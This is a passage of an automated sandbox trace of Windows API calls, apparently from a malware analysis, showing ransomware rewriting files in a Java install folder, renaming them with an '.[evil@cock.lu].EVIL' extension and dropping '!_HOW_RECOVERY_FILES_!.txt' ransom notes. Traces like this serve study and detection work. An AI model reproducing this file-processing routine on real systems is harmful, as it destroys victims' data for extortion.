nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0093.136] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.136] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.136] _errno () returned 0x84b1160840 [0093.137] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.137] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0093.137] CloseHandle (hObject=0x1a4) returned 1 [0093.137] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.137] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.137] __uncaught_exception () returned 0x84b1160800 [0093.137] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.137] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\pack200.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\pack200.exe.[evil@cock.lu].evil")) returned 1 [0093.138] ??_V@YAXPEAX@Z () returned 0x1 [0093.141] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe", dwFileAttributes=0x0) returned 0 [0093.141] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.141] wcsstr (_Str="plugin2", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.141] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2") returned 47 [0093.141] wcscmp (_String1=".", _String2="plugin2") returned -1 [0093.141] wcscmp (_String1="..", _String2="plugin2") returned -1 [0093.141] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2") returned 0x2f [0093.141] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2") returned 0x0 [0093.141] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\*" [0093.142] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddb00 [0093.142] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\.") returned 49 [0093.142] wcscmp (_String1=".", _String2=".") returned 0 [0093.142] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.142] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\..") returned 50 [0093.142] wcscmp (_String1=".", _String2="..") returned -1 [0093.142] wcscmp (_String1="..", _String2="..") returned 0 [0093.142] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.142] wcsstr (_Str="msvcr100.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.142] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll") returned 60 [0093.142] wcscmp (_String1="msvcr100.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.142] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msvcr100.dll") returned 0x0 [0093.142] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll") returned 0x3c [0093.142] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0093.145] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xca750, lpOverlapped=0x0) returned 1 [0093.176] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.176] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.176] _errno () returned 0x84b1160840 [0093.177] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.177] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xca760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xca760, lpOverlapped=0x0) returned 1 [0093.179] CloseHandle (hObject=0x1a8) returned 1 [0093.179] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.179] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.179] __uncaught_exception () returned 0x84b1160800 [0093.179] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.180] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll.[evil@cock.lu].evil")) returned 1 [0093.180] ??_V@YAXPEAX@Z () returned 0x1 [0093.183] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\msvcr100.dll", dwFileAttributes=0x0) returned 0 [0093.184] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0093.184] wcsstr (_Str="npjp2.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.184] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll") returned 57 [0093.184] wcscmp (_String1="npjp2.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.184] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="npjp2.dll") returned 0x0 [0093.184] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll") returned 0x39 [0093.184] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0093.186] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x39240, lpOverlapped=0x0) returned 1 [0093.223] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.223] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.223] _errno () returned 0x84b1160840 [0093.223] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.223] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x39260, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x39260, lpOverlapped=0x0) returned 1 [0093.224] CloseHandle (hObject=0x1a8) returned 1 [0093.224] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.224] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.224] __uncaught_exception () returned 0x84b1160800 [0093.224] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.225] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll.[evil@cock.lu].evil")) returned 1 [0093.225] ??_V@YAXPEAX@Z () returned 0x1 [0093.229] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\npjp2.dll", dwFileAttributes=0x0) returned 0 [0093.229] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0093.229] FindClose (in: hFindFile=0x84b11ddb00 | out: hFindFile=0x84b11ddb00) returned 1 [0093.229] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2") returned 0x2f [0093.229] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0093.229] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0093.229] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\plugin2\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.239] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0093.239] __uncaught_exception () returned 0x84b1160800 [0093.239] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.240] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.240] wcsstr (_Str="policytool.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.240] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe") returned 54 [0093.240] wcscmp (_String1="policytool.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.240] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="policytool.exe") returned 0x0 [0093.240] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe") returned 0x36 [0093.240] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\policytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.242] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4040, lpOverlapped=0x0) returned 1 [0093.245] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.245] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.245] _errno () returned 0x84b1160840 [0093.245] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.245] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4060, lpOverlapped=0x0) returned 1 [0093.245] CloseHandle (hObject=0x1a4) returned 1 [0093.245] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.246] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.246] __uncaught_exception () returned 0x84b1160800 [0093.246] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.246] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\policytool.exe"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\policytool.exe.[evil@cock.lu].evil")) returned 1 [0093.246] ??_V@YAXPEAX@Z () returned 0x1 [0093.250] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe", dwFileAttributes=0x0) returned 0 [0093.250] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.250] wcsstr (_Str="prism_common.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.250] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll") returned 56 [0093.250] wcscmp (_String1="prism_common.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.250] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="prism_common.dll") returned 0x0 [0093.250] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll") returned 0x38 [0093.250] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_common.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.253] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0xe040, lpOverlapped=0x0) returned 1 [0093.256] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.256] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.256] _errno () returned 0x84b1160840 [0093.256] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.256] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xe060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0xe060, lpOverlapped=0x0) returned 1 [0093.256] CloseHandle (hObject=0x1a4) returned 1 [0093.257] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.257] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.257] __uncaught_exception () returned 0x84b1160800 [0093.257] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.257] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_common.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_common.dll.[evil@cock.lu].evil")) returned 1 [0093.258] ??_V@YAXPEAX@Z () returned 0x1 [0093.261] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_common.dll", dwFileAttributes=0x0) returned 0 [0093.261] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.273] wcsstr (_Str="prism_d3d.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.273] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll") returned 53 [0093.273] wcscmp (_String1="prism_d3d.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.273] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="prism_d3d.dll") returned 0x0 [0093.273] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll") returned 0x35 [0093.273] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_d3d.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.275] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x1fe40, lpOverlapped=0x0) returned 1 [0093.278] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.279] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.279] _errno () returned 0x84b1160840 [0093.279] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.279] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1fe60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x1fe60, lpOverlapped=0x0) returned 1 [0093.279] CloseHandle (hObject=0x1a4) returned 1 [0093.279] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.280] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.280] __uncaught_exception () returned 0x84b1160800 [0093.280] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.280] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_d3d.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_d3d.dll.[evil@cock.lu].evil")) returned 1 [0093.280] ??_V@YAXPEAX@Z () returned 0x1 [0093.284] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_d3d.dll", dwFileAttributes=0x0) returned 0 [0093.284] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.284] wcsstr (_Str="prism_sw.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.284] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll") returned 52 [0093.284] wcscmp (_String1="prism_sw.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.284] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="prism_sw.dll") returned 0x0 [0093.284] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll") returned 0x34 [0093.285] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_sw.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.287] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x17e40, lpOverlapped=0x0) returned 1 [0093.290] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.290] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.290] _errno () returned 0x84b1160840 [0093.290] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.290] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x17e60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x17e60, lpOverlapped=0x0) returned 1 [0093.290] CloseHandle (hObject=0x1a4) returned 1 [0093.290] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.291] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.291] __uncaught_exception () returned 0x84b1160800 [0093.291] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.291] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_sw.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\prism_sw.dll.[evil@cock.lu].evil")) returned 1 [0093.292] ??_V@YAXPEAX@Z () returned 0x1 [0093.295] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\prism_sw.dll", dwFileAttributes=0x0) returned 0 [0093.295] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0093.295] wcsstr (_Str="resource.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0093.295] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll") returned 52 [0093.295] wcscmp (_String1="resource.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0093.295] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="resource.dll") returned 0x0 [0093.295] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll") returned 0x34 [0093.295] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\resource.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0093.297] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x3c40, lpOverlapped=0x0) returned 1 [0093.300] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.300] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0093.300] _errno () returned 0x84b1160840 [0093.301] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.301] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x3c60, lpOverlapped=0x0) returned 1 [0093.301] CloseHandle (hObject=0x1a4) returned 1 [0093.301] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0093.301] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0093.301] __uncaught_exception () returned 0x84b1160800 [0093.301] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0093.301] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\resource.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\resource.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program 